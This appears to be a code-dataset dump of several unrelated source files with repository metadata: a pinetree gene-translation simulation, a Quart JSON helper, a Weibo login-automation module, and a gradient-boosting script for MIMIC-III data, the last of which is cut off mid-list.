] | 6 | 2020-07-20T21:35:07.000Z | 2021-06-22T06:51:03.000Z | examples/three_genes_recoded.py | alexismhill3/pinetree | 45a1c2eae4cb3677b26794b9f1dc8a304e237550 | [
"MIT"
] | 12 | 2019-09-09T16:31:29.000Z | 2021-09-15T18:10:01.000Z | examples/three_genes_recoded.py | alexismhill3/pinetree | 45a1c2eae4cb3677b26794b9f1dc8a304e237550 | [
"MIT"
] | 4 | 2017-09-08T03:21:49.000Z | 2019-08-27T21:12:04.000Z | import pinetree as pt
def execute(output):
sim = pt.Model(cell_volume=8e-16)
sim.seed(34)
sim.add_polymerase(name="rnapol", copy_number=10, speed=40, footprint=10)
sim.add_ribosome(copy_number=100, speed=30, footprint=10)
plasmid = pt.Genome(name="plasmid", length=605)
plasmid.add_promoter(name="p1", start=1, stop=10,
interactions={"rnapol": 2e8})
plasmid.add_terminator(name="t1", start=604, stop=605,
efficiency={"rnapol": 1.0})
plasmid.add_gene(name="rnapol", start=26, stop=225,
rbs_start=(26 - 15), rbs_stop=26, rbs_strength=1e7)
plasmid.add_gene(name="proteinX", start=241, stop=280,
rbs_start=(241 - 15), rbs_stop=241, rbs_strength=1e7)
plasmid.add_gene(name="proteinY", start=296, stop=595,
rbs_start=(296 - 15), rbs_stop=296, rbs_strength=1e7)
plasmid.add_weights([1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0])
sim.register_genome(plasmid)
sim.simulate(time_limit=60, time_step=1, output=output + "_counts.tsv")
if __name__ == "__main__":
execute("three_genes_recoded")
| 127.2 | 1,688 | 0.494834 | 1,364 | 4,452 | 1.590176 | 0.052786 | 0.296911 | 0.441217 | 0.58829 | 0.729368 | 0.718303 | 0.718303 | 0.688797 | 0.688797 | 0.688797 | 0 | 0.441522 | 0.197215 | 4,452 | 34 | 1,689 | 130.941176 | 0.165361 | 0 | 0 | 0 | 0 | 0 | 0.019991 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.086957 | 0.086957 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
04491e775309b8358ffea697d8da98e036c1d778 | 115 | py | Python | components/mlserve/mlpm/response.py | autoai-org/AIFlow | 2368f0e1f8df78cce568266e3c88e493eff1ac89 | [
"Apache-2.0"
] | 207 | 2020-02-03T14:20:24.000Z | 2021-12-13T20:07:06.000Z | components/mlserve/mlpm/response.py | autoai-org/AIFlow | 2368f0e1f8df78cce568266e3c88e493eff1ac89 | [
"Apache-2.0"
] | 1,226 | 2020-01-06T21:11:12.000Z | 2022-03-31T13:31:52.000Z | components/mlserve/mlpm/response.py | autoai-org/CVPM | 2368f0e1f8df78cce568266e3c88e493eff1ac89 | [
"MIT"
] | 20 | 2020-01-13T15:09:46.000Z | 2022-03-14T19:16:45.000Z | # coding:utf-8
from quart import Response, jsonify
def json_resp(data, status):
return jsonify(data), status
| 16.428571 | 35 | 0.73913 | 17 | 115 | 4.941176 | 0.823529 | 0.238095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010417 | 0.165217 | 115 | 6 | 36 | 19.166667 | 0.864583 | 0.104348 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
f0a2bfd68bb459f17c24c93680257c8dae8140ae | 13,918 | py | Python | DecryptLogin/modules/core/weibo.py | 0honus0/DecryptLogin | 8cc4527d37bee4ff0aeecbaf93e2d3910abf44f7 | [
"MIT"
] | null | null | null | DecryptLogin/modules/core/weibo.py | 0honus0/DecryptLogin | 8cc4527d37bee4ff0aeecbaf93e2d3910abf44f7 | [
"MIT"
] | null | null | null | DecryptLogin/modules/core/weibo.py | 0honus0/DecryptLogin | 8cc4527d37bee4ff0aeecbaf93e2d3910abf44f7 | [
"MIT"
] | null | null | null | '''
Function:
微博模拟登录
Author:
Charles
微信公众号:
Charles的皮卡丘
更新日期:
2022-03-10
'''
import os
import re
import time
import json
import requests
from ..utils import removeImage, showImage, saveImage
'''PC端登录微博'''
class weiboPC():
is_callable = True
def __init__(self, **kwargs):
for key, value in kwargs.items(): setattr(self, key, value)
self.info = 'login in weibo in pc mode'
self.session = requests.Session()
self.__initialize()
'''登录函数'''
def login(self, username, password, crack_captcha_func=None, **kwargs):
# 设置代理
self.session.proxies.update(kwargs.get('proxies', {}))
# 模拟登录
data = {
'username': username,
'password': password,
'savestate': '1',
'ec': '1',
'pagerefer': '',
'entry': 'wapsso',
'sinacnlogin': '1',
}
response = self.session.post(self.login_url, headers=self.login_headers, data=data)
response_json = response.json()
# 登录成功
if response_json['retcode'] in [20000000]:
print('[INFO]: Account -> %s, login successfully' % username)
infos_return = {'username': username}
infos_return.update(response_json)
return infos_return, self.session
# 用户名或密码错误
elif response_json['retcode'] in [50011002]:
raise RuntimeError('Account -> %s, fail to login, username or password error' % username)
# 安全验证
elif response_json['retcode'] in [50050011]:
response = self.session.get(response_json['data']['errurl'])
msg_type, tip_content, num_times = 'sms', 'You have to secondverify your account, please input the sms code your phone received: ', 0
response_json = self.__sendverificationcode(username, msg_type=msg_type, verification_page=response)
while response_json['retcode'] not in [100000]:
num_times += 1
if num_times > 1: raise RuntimeError(response_json.get('msg'))
if response_json['retcode'] in [8513]:
msg_type, tip_content = 'private_msg', 'You have to secondverify your account, please input the verification code in your private message: '
response_json = self.__sendverificationcode(username, msg_type=msg_type, verification_page=response)
break
else:
raise RuntimeError(response_json.get('msg'))
code = input(tip_content)
params = {
'code': code,
'msg_type': msg_type,
}
response = self.session.get(self.ajcheck_url, params=params)
response_json = response.json()
if response_json['retcode'] not in [100000]:
raise RuntimeError(response_json.get('msg'))
login_url = response_json['data']['url']
self.session.get(login_url)
print('[INFO]: Account -> %s, login successfully' % username)
infos_return = {'username': username}
infos_return.update(response_json)
return infos_return, self.session
# 其他错误
else:
raise RuntimeError(response_json['msg'])
'''安全验证, 发送验证码'''
def __sendverificationcode(self, username=None, msg_type='sms', verification_page=None):
assert msg_type in ['sms', 'private_msg']
params = {'msg_type': msg_type}
if msg_type == 'sms':
infos = json.loads(re.search(r'phoneList: JSON.parse\(\'([^\']+)\'\),', verification_page.text).group(1))
params.update({
'number': infos[0]['number'],
'mask_mobile': infos[0]['maskMobile'],
})
else:
self.session.get('https://passport.weibo.cn/signin/secondverify/index', params={'way': 'private_msg'})
response = self.session.get(self.ajsend_url, params=params)
return response.json()
'''初始化'''
def __initialize(self):
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
}
self.login_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
'Content': 'application/x-www-form-urlencoded',
'Origin': 'https://passport.sina.cn',
'Referer': 'https://passport.sina.cn/signin/signin'
}
self.login_url = 'https://passport.sina.cn/sso/login'
self.ajsend_url = 'https://passport.weibo.cn/signin/secondverify/ajsend'
self.ajcheck_url = 'https://passport.weibo.cn/signin/secondverify/ajcheck'
self.session.headers.update(self.headers)
'''移动端登录微博'''
class weiboMobile():
is_callable = True
def __init__(self, **kwargs):
for key, value in kwargs.items(): setattr(self, key, value)
self.info = 'login in weibo in mobile mode'
self.session = requests.Session()
self.__initialize()
'''登录函数'''
def login(self, username, password, crack_captcha_func=None, **kwargs):
# 设置代理
self.session.proxies.update(kwargs.get('proxies', {}))
# 模拟登录
data = {
'username': username,
'password': password,
'savestate': '1',
'ec': '1',
'pagerefer': '',
'entry': 'wapsso',
'sinacnlogin': '1',
}
response = self.session.post(self.login_url, headers=self.login_headers, data=data)
response_json = response.json()
# 登录成功
if response_json['retcode'] in [20000000]:
print('[INFO]: Account -> %s, login successfully' % username)
infos_return = {'username': username}
infos_return.update(response_json)
return infos_return, self.session
# 用户名或密码错误
elif response_json['retcode'] in [50011002]:
raise RuntimeError('Account -> %s, fail to login, username or password error' % username)
# 安全验证
elif response_json['retcode'] in [50050011]:
response = self.session.get(response_json['data']['errurl'])
msg_type, tip_content, num_times = 'sms', 'You have to secondverify your account, please input the sms code your phone received: ', 0
response_json = self.__sendverificationcode(username, msg_type=msg_type, verification_page=response)
while response_json['retcode'] not in [100000]:
num_times += 1
if num_times > 1: raise RuntimeError(response_json.get('msg'))
if response_json['retcode'] in [8513]:
msg_type, tip_content = 'private_msg', 'You have to secondverify your account, please input the verification code in your private message: '
response_json = self.__sendverificationcode(username, msg_type=msg_type, verification_page=response)
break
else:
raise RuntimeError(response_json.get('msg'))
code = input(tip_content)
params = {
'code': code,
'msg_type': msg_type,
}
response = self.session.get(self.ajcheck_url, params=params)
response_json = response.json()
if response_json['retcode'] not in [100000]:
raise RuntimeError(response_json.get('msg'))
login_url = response_json['data']['url']
self.session.get(login_url)
print('[INFO]: Account -> %s, login successfully' % username)
infos_return = {'username': username}
infos_return.update(response_json)
return infos_return, self.session
# 其他错误
else:
raise RuntimeError(response_json['msg'])
'''安全验证, 发送验证码'''
def __sendverificationcode(self, username=None, msg_type='sms', verification_page=None):
assert msg_type in ['sms', 'private_msg']
params = {'msg_type': msg_type}
if msg_type == 'sms':
infos = json.loads(re.search(r'phoneList: JSON.parse\(\'([^\']+)\'\),', verification_page.text).group(1))
params.update({
'number': infos[0]['number'],
'mask_mobile': infos[0]['maskMobile'],
})
else:
self.session.get('https://passport.weibo.cn/signin/secondverify/index', params={'way': 'private_msg'})
response = self.session.get(self.ajsend_url, params=params)
return response.json()
'''初始化'''
def __initialize(self):
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
}
self.login_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
'Content': 'application/x-www-form-urlencoded',
'Origin': 'https://passport.sina.cn',
'Referer': 'https://passport.sina.cn/signin/signin'
}
self.login_url = 'https://passport.sina.cn/sso/login'
self.ajsend_url = 'https://passport.weibo.cn/signin/secondverify/ajsend'
self.ajcheck_url = 'https://passport.weibo.cn/signin/secondverify/ajcheck'
self.session.headers.update(self.headers)
'''扫码登录微博'''
class weiboScanqr():
is_callable = True
def __init__(self, **kwargs):
for key, value in kwargs.items(): setattr(self, key, value)
self.info = 'login in weibo in scanqr mode'
self.cur_path = os.getcwd()
self.session = requests.Session()
self.__initialize()
'''登录函数'''
def login(self, username='', password='', crack_captcha_func=None, **kwargs):
# 设置代理
self.session.proxies.update(kwargs.get('proxies', {}))
# 获取二维码
params = {
'entry': 'weibo',
'size': '180',
'callback': str(int(time.time() * 1000)),
}
response = self.session.get(self.qrcode_url, params=params)
response_json = json.loads(response.text.split('(')[-1].split(')')[0])
qrid = response_json['data']['qrid']
imageurl = 'https:' + response_json['data']['image']
response = self.session.get(imageurl)
saveImage(response.content, os.path.join(self.cur_path, 'qrcode.jpg'))
showImage(os.path.join(self.cur_path, 'qrcode.jpg'))
# 检测二维码状态
while True:
params = {
'entry': 'weibo',
'qrid': qrid,
'callback': 'STK_%s' % int(time.time() * 10000)
}
response = self.session.get(self.check_url, params=params)
response_json = json.loads(response.text.split('(')[-1].split(')')[0])
if response_json['retcode'] in [20000000]: break
time.sleep(0.5)
removeImage(os.path.join(self.cur_path, 'qrcode.jpg'))
# 模拟登录
params = {
'entry': 'weibo',
'returntype': 'TEXT',
'crossdomain': '1',
'cdult': '3',
'domain': 'weibo.com',
'alt': response_json['data']['alt'],
'savestate': '30',
'callback': 'STK_' + str(int(time.time() * 1000)),
}
response = self.session.get(self.login_url, params=params)
response_json = json.loads(response.text.split('(')[-1].split(')')[0])
response_json['crossDomainUrlList'][0] = response_json['crossDomainUrlList'][0] + '&action=login'
for url in response_json['crossDomainUrlList']:
response = self.session.get(url)
# 登录成功
response = self.session.get(self.home_url)
print('[INFO]: Account -> %s, login successfully' % response_json.get('nick', username))
infos_return = {'username': username}
infos_return.update(response_json)
return infos_return, self.session
'''初始化'''
def __initialize(self):
self.headers = {
'Referer': 'https://mail.sina.com.cn/',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'
}
self.home_url = 'https://weibo.com'
self.qrcode_url = 'https://login.sina.com.cn/sso/qrcode/image'
self.check_url = 'https://login.sina.com.cn/sso/qrcode/check'
self.login_url = 'http://login.sina.com.cn/sso/login.php'
self.session.headers.update(self.headers)
'''
Function:
微博模拟登录
Detail:
-login:
Input:
--username: 用户名
--password: 密码
--mode: mobile/pc/scanqr
--crack_captcha_func: 若提供验证码接口, 则利用该接口来实现验证码的自动识别
--proxies: 为requests.Session()设置代理
Return:
--infos_return: 用户名等信息
--session: 登录后的requests.Session()
'''
class weibo():
def __init__(self, **kwargs):
self.info = 'login in weibo'
self.supported_modes = {
'pc': weiboPC(**kwargs),
'mobile': weiboMobile(**kwargs),
'scanqr': weiboScanqr(**kwargs),
}
'''登录函数'''
def login(self, username='', password='', mode='scanqr', crack_captcha_func=None, **kwargs):
assert mode in self.supported_modes, 'unsupport mode %s in weibo.login' % mode
selected_api = self.supported_modes[mode]
if not selected_api.is_callable: raise NotImplementedError('not be implemented for mode %s in weibo.login' % mode)
args = {
'username': username,
'password': password,
'crack_captcha_func': crack_captcha_func,
}
args.update(kwargs)
return selected_api.login(**args) | 43.767296 | 160 | 0.582196 | 1,544 | 13,918 | 5.106865 | 0.154145 | 0.082181 | 0.028408 | 0.033481 | 0.818643 | 0.793912 | 0.772226 | 0.762968 | 0.743691 | 0.743691 | 0 | 0.0286 | 0.278991 | 13,918 | 318 | 161 | 43.767296 | 0.75715 | 0.013077 | 0 | 0.703125 | 0 | 0.015625 | 0.241429 | 0.004995 | 0 | 0 | 0 | 0 | 0.011719 | 1 | 0.050781 | false | 0.082031 | 0.023438 | 0 | 0.132813 | 0.019531 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
f0d31efc1716543f1df0d464fc69abc0cf109764 | 28,871 | py | Python | code/gradient_boosting.py | translational-informatics/MIMICIII-ML-experiments | c549fd9625614eb7bd5d237291b1da9800f0094c | [
"MIT"
] | 5 | 2018-12-20T11:19:09.000Z | 2019-11-20T07:43:15.000Z | code/gradient_boosting.py | translational-informatics/MIMICIII-ML-experiments | c549fd9625614eb7bd5d237291b1da9800f0094c | [
"MIT"
] | null | null | null | code/gradient_boosting.py | translational-informatics/MIMICIII-ML-experiments | c549fd9625614eb7bd5d237291b1da9800f0094c | [
"MIT"
] | 2 | 2020-06-11T20:02:13.000Z | 2021-09-20T08:46:58.000Z | # This file applies GradientBoosting to given train/test pickle
# It applies basic grid search with 10 fold cross validation
# It also tabulates the weights for trained model
import argparse
import pickle
from sklearn.metrics import classification_report,confusion_matrix,roc_auc_score
import directories
parser = argparse.ArgumentParser(description='Parser to pass number of top features')
parser.add_argument('--top-fc', default=42, type=int, help='top_feature_count')
parser.add_argument('--data-set', default=0, type=int, help='Data set pickle to use (0-3)')
args = parser.parse_args()
if args.top_fc==0:
tail = "11_clinincally_viable_features/"
else:
tail = "top_{}_features/".format(args.top_fc)
if args.data_set==1:
feature_dir = directories.pickled_data_demographics+tail
elif args.data_set==2:
feature_dir = directories.pickled_data_interventions+tail
elif args.data_set==3:
feature_dir = directories.pickled_data_triples+tail
else:
feature_dir = directories.pickled_data+tail
print(feature_dir)
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import KFold
from sklearn.model_selection import GridSearchCV
X_pr_train=[]
X_pr_test=[]
Y_np_train=[]
Y_np_test=[]
with open(feature_dir+"X_pr_train.pickle", 'rb') as handle:
X_pr_train = pickle.load(handle)
with open(feature_dir+"X_pr_test.pickle", 'rb') as handle:
X_pr_test = pickle.load(handle)
with open(feature_dir+"Y_np_train.pickle", 'rb') as handle:
Y_np_train = pickle.load(handle)
with open(feature_dir+"Y_np_test.pickle", 'rb') as handle:
Y_np_test = pickle.load(handle)
clf = GradientBoostingClassifier()
svc_grid = GridSearchCV(estimator=clf,scoring = 'roc_auc', param_grid=dict(max_leaf_nodes=[3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]),cv =10,n_jobs =10)
# svc_grid = GridSearchCV(estimator=clf,scoring = 'roc_auc', param_grid=dict(max_leaf_nodes=[3]),cv =10,n_jobs =15)
print(svc_grid)
print("---"*10)
## %%time
import pickle
import os
print("Started Training")
print("---"*10)
svc_grid.fit(X_pr_train, Y_np_train)
save_dir = os.path.join(feature_dir)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
pickle.dump(svc_grid,open(save_dir+'/gradient_boosting_tree.pickle',"wb"))
print("Saved File")
#---- Train Scores ----#
#print(svc_grid.best_estimator_)
#print(svc_grid.best_estimator_.get_params())
#ll = svc_grid.best_estimator_.coef_.tolist()[0]
#c = 0
#for l in ll:
# if l<-0.00001 or l>0.0001:
# c = c+1
#print("Coefficients")
#print(ll)
#print("Coefficients %d"%len(ll))
#print("Non-zero coefficients %d"%c)
y_pred = svc_grid.predict(X_pr_train)
print("Train Scores")
print("---"*10)
print('Classification Report \n',classification_report(Y_np_train, y_pred))
print("-"*10)
print('CONFUSION MATRIX \n',confusion_matrix(Y_np_train, y_pred))
print("-"*10)
pred_scores = svc_grid.best_estimator_.predict_proba(X_pr_train)
print('Roc value\n',roc_auc_score(Y_np_train,pred_scores[:,1]))
#-- Test Scores---#
print("Test Scores")
print("---"*10)
y_pred = svc_grid.predict(X_pr_test)
print('Classification Report \n',classification_report(Y_np_test, y_pred))
print("-"*10)
print('CONFUSION MATRIX \n',confusion_matrix(Y_np_test, y_pred))
print("-"*10)
pred_scores = svc_grid.predict_proba(X_pr_test)
print('Roc value\n',roc_auc_score(Y_np_test,pred_scores[:,1]))
f_imp = svc_grid.best_estimator_.feature_importances_
print("Feature importance")
print(f_imp)
print("[")
for l in f_imp:
print(str(l)+",")
print("]")
def tabulate_weights(features,weights):
pos = 0
non_zero_count = 0
feature_total = {}
feature_count = {}
for x in features:
l = len(x)
n = x
if x[l-4:l]==" min":
n = x[0:l-4]
elif x[l-4:l]==" max":
n = x[0:l-4]
elif x[l-5:l]==" mean":
n = x[0:l-5]
elif x[l-5:l]==" skew":
n = x[0:l-5]
elif x[l-4:l]==" std":
n = x[0:l-4]
c = 48
while c > 0:
c = c-1
feature_total[n] = feature_total.setdefault(n,0)+weights[pos]
feature_count[n] = feature_count.setdefault(n,0)+1
if weights[pos]>0:
non_zero_count = non_zero_count+1
pos = pos+1
k = list(feature_total.keys())
k.sort(key= lambda x: feature_total[x])
l = []
for q in k:
l.append((q,feature_total[q],feature_count[q]))
return (l,feature_total,feature_count,non_zero_count)
if args.data_set==0:
if args.top_fc==0:
features = [
"Bicarbonate max",
"Bicarbonate mean",
"Bicarbonate min",
"Bicarbonate skew",
"Bicarbonate std",
"Blood urea nitrogen max",
"Blood urea nitrogen mean",
"Blood urea nitrogen min",
"Blood urea nitrogen skew",
"Blood urea nitrogen std",
"CO2 (ETCO2, PCO2, etc.) max",
"CO2 (ETCO2, PCO2, etc.) mean",
"CO2 (ETCO2, PCO2, etc.) min",
"CO2 (ETCO2, PCO2, etc.) skew",
"CO2 (ETCO2, PCO2, etc.) std",
"Creatinine max",
"Creatinine mean",
"Creatinine min",
"Creatinine skew",
"Creatinine std",
"Lactate max",
"Lactate mean",
"Lactate min",
"Lactate skew",
"Lactate std",
"Oxygen saturation max",
"Oxygen saturation mean",
"Oxygen saturation min",
"Oxygen saturation skew",
"Oxygen saturation std",
"Partial pressure of carbon dioxide max",
"Partial pressure of carbon dioxide mean",
"Partial pressure of carbon dioxide min",
"Partial pressure of carbon dioxide skew",
"Partial pressure of carbon dioxide std",
"Positive end-expiratory pressure max",
"Positive end-expiratory pressure mean",
"Positive end-expiratory pressure min",
"Positive end-expiratory pressure skew",
"Positive end-expiratory pressure std",
"Potassium max",
"Potassium mean",
"Potassium min",
"Potassium skew",
"Potassium std",
"White blood cell count max",
"White blood cell count mean",
"White blood cell count min",
"White blood cell count skew",
"White blood cell count std",
"pH max",
"pH mean",
"pH min",
"pH skew",
"pH std",
]
elif args.top_fc==42:
features = [
"Blood culture max",
"Blood culture mean",
"Blood culture min",
"Blood culture skew",
"Blood culture std",
"Creatinine max",
"Creatinine mean",
"Creatinine min",
"Creatinine skew",
"Creatinine std",
"Red blood cell count max",
"Red blood cell count mean",
"Red blood cell count min",
"Red blood cell count skew",
"Red blood cell count std",
"Glucose max",
"Glucose mean",
"Glucose min",
"Glucose skew",
"Glucose std",
"Cholesterol max",
"Cholesterol mean",
"Cholesterol min",
"Cholesterol skew",
"Cholesterol std",
"pH max",
"pH mean",
"pH min",
"pH skew",
"pH std",
"Potassium max",
"Potassium mean",
"Potassium min",
"Potassium skew",
"Potassium std",
"Calcium max",
"Calcium mean",
"Calcium min",
"Calcium skew",
"Calcium std",
"Lactate dehydrogenase max",
"Lactate dehydrogenase mean",
"Lactate dehydrogenase min",
"Lactate dehydrogenase skew",
"Lactate dehydrogenase std",
"Lactate max",
"Lactate mean",
"Lactate min",
"Lactate skew",
"Lactate std",
"Chloride max",
"Chloride mean",
"Chloride min",
"Chloride skew",
"Chloride std",
"Partial pressure of carbon dioxide max",
"Partial pressure of carbon dioxide mean",
"Partial pressure of carbon dioxide min",
"Partial pressure of carbon dioxide skew",
"Partial pressure of carbon dioxide std",
"Mean corpuscular hemoglobin concentration max",
"Mean corpuscular hemoglobin concentration mean",
"Mean corpuscular hemoglobin concentration min",
"Mean corpuscular hemoglobin concentration skew",
"Mean corpuscular hemoglobin concentration std",
"Mean corpuscular hemoglobin max",
"Mean corpuscular hemoglobin mean",
"Mean corpuscular hemoglobin min",
"Mean corpuscular hemoglobin skew",
"Mean corpuscular hemoglobin std",
"Partial thromboplastin time max",
"Partial thromboplastin time mean",
"Partial thromboplastin time min",
"Partial thromboplastin time skew",
"Partial thromboplastin time std",
"Prothrombin time max",
"Prothrombin time mean",
"Prothrombin time min",
"Prothrombin time skew",
"Prothrombin time std",
"Magnesium max",
"Magnesium mean",
"Magnesium min",
"Magnesium skew",
"Magnesium std",
"Oxygen saturation max",
"Oxygen saturation mean",
"Oxygen saturation min",
"Oxygen saturation skew",
"Oxygen saturation std",
"CO2 (ETCO2, PCO2, etc.) max",
"CO2 (ETCO2, PCO2, etc.) mean",
"CO2 (ETCO2, PCO2, etc.) min",
"CO2 (ETCO2, PCO2, etc.) skew",
"CO2 (ETCO2, PCO2, etc.) std",
"White blood cell count max",
"White blood cell count mean",
"White blood cell count min",
"White blood cell count skew",
"White blood cell count std",
"Positive end-expiratory pressure max",
"Positive end-expiratory pressure mean",
